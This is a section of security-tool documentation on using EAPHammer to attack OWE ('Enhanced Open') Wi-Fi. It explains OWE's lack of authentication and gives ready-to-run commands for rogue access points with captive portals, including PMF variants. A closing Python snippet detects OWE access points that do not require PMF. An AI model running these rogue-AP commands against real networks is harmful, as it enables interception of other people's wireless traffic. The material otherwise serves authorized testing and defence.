XV. Attacking Opportunistic Wireless Encryption
Special thanks to Steve Darracott for his help researching this subject: @thedarracott
EAPHammer supports attacks against networks and clients that are configured to use Opportunistic Wireless Encryption (OWE), which is also known as "Enhanced Open". For a theoretical overview of this subject, please refer to the following blog posts:
- https://posts.specterops.io/war-never-changes-attacks-against-wpa3s-enhanced-open-part-1-how-we-got-here-71f5a80e3be7
- https://posts.specterops.io/war-never-changes-attacks-against-wpa3s-enhanced-open-part-2-understanding-owe-90fdc29126a1
- link to part iii here
tl;dr - OWE is used to provide encryption capabilities to public wireless networks. You can think of OWE like this - OWE is to open networks as HTTPS is to HTTP. However, unlike HTTPS, OWE does not provide any means of authenticating the identity of what you're connecting to (HTTPS uses server certs). This means that it can be compromised using Person-In-the-Middle (PITM) attacks. From an operational standpoint, this means that you can execute rogue AP attacks against OWE in the same way you would against open networks.
To create a rogue access point that uses OWE, just pass the `--auth owe` flag as shown in the following example:

```
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal
```

Note that by default, eaphammer will conform to RFC 8110 by requiring stations to use Protected Management Frames (PMF) when `--auth owe` is used. You are free to tell eaphammer to violate RFC 8110 by making PMF enabled but not required:

```
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf enable
```

Should you wish to commit an even more egregious RFC violation, you can disable PMF completely as well:

```
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf disable
```

EAPHammer also supports attacks against OWE Transition Mode. To create a rogue AP that uses OWE Transition Mode, use the `--auth owe-transition` flag as shown in the following example:

```
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal
```

By default, eaphammer will conform to RFC 8110 by enabling but not requiring PMF when `--auth owe-transition` is used. You are free to tell eaphammer to violate RFC 8110 by making PMF required:

```
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf require
```

Alternatively, you can disable PMF completely:

```
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf disable
```
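The three PMF postures above (required, enabled only, disabled) are visible to anyone monitoring the air: an AP advertises them in the RSN information element of its beacons, and RFC 8110 expects an OWE AP to set the "PMF required" bit. The following Python is an added example, not part of EAPHammer, that decodes a raw RSN IE and flags OWE APs whose PMF setting falls short of the RFC; the sample IEs it builds are constructed here (CCMP ciphers, one AKM suite) rather than captured from a real network.

```python
import struct

WFA_OUI = b"\x00\x0f\xac"
AKM_OWE = 18          # 802.11 AKM suite selector 00-0f-ac:18 is OWE
RSN_ELEMENT_ID = 48
MFPR, MFPC = 1 << 6, 1 << 7   # RSN capability bits: PMF required / capable

def parse_rsn_ie(ie: bytes) -> dict:
    """Decode a raw RSN information element into its suite lists and caps."""
    if len(ie) < 4 or ie[0] != RSN_ELEMENT_ID or ie[1] != len(ie) - 2:
        raise ValueError("not a well-formed RSN information element")
    body = ie[2:]
    version, = struct.unpack_from("<H", body, 0)
    group = body[2:6]
    n_pair, = struct.unpack_from("<H", body, 6)
    off = 8
    pairwise = [body[off + 4 * i: off + 4 * i + 4] for i in range(n_pair)]
    off += 4 * n_pair
    n_akm, = struct.unpack_from("<H", body, off)
    off += 2
    akms = [body[off + 4 * i: off + 4 * i + 4] for i in range(n_akm)]
    off += 4 * n_akm
    # The capabilities field is optional; a missing field means no PMF bits.
    caps = struct.unpack_from("<H", body, off)[0] if len(body) >= off + 2 else 0
    return {"version": version, "group": group, "pairwise": pairwise,
            "akms": akms, "caps": caps}

def classify_owe_pmf(ie: bytes) -> str:
    """Map an AP's RSN IE to the three PMF postures discussed above."""
    info = parse_rsn_ie(ie)
    if WFA_OUI + bytes([AKM_OWE]) not in info["akms"]:
        return "not-owe"
    if info["caps"] & MFPR:
        return "owe-pmf-required"       # conforms to RFC 8110
    if info["caps"] & MFPC:
        return "owe-pmf-enabled-only"   # PMF optional: RFC 8110 violation
    return "owe-pmf-disabled"           # no PMF at all: RFC 8110 violation

def build_rsn_ie(akm_type: int, caps: int) -> bytes:
    """Constructed sample IE: CCMP group and pairwise cipher, one AKM suite."""
    body = struct.pack("<H", 1) + WFA_OUI + b"\x04"          # version, group
    body += struct.pack("<H", 1) + WFA_OUI + b"\x04"         # 1 pairwise suite
    body += struct.pack("<H", 1) + WFA_OUI + bytes([akm_type])
    body += struct.pack("<H", caps)
    return bytes([RSN_ELEMENT_ID, len(body)]) + body

if __name__ == "__main__":
    for flag, caps in (("require", MFPR | MFPC), ("enable", MFPC), ("disable", 0)):
        print(f"--pmf {flag}: {classify_owe_pmf(build_rsn_ie(AKM_OWE, caps))}")
```

Feeding real RSN IEs from a beacon capture (for example, the element bytes extracted by a packet parser) into `classify_owe_pmf` gives a wireless survey a direct check for OWE APs that do not require PMF.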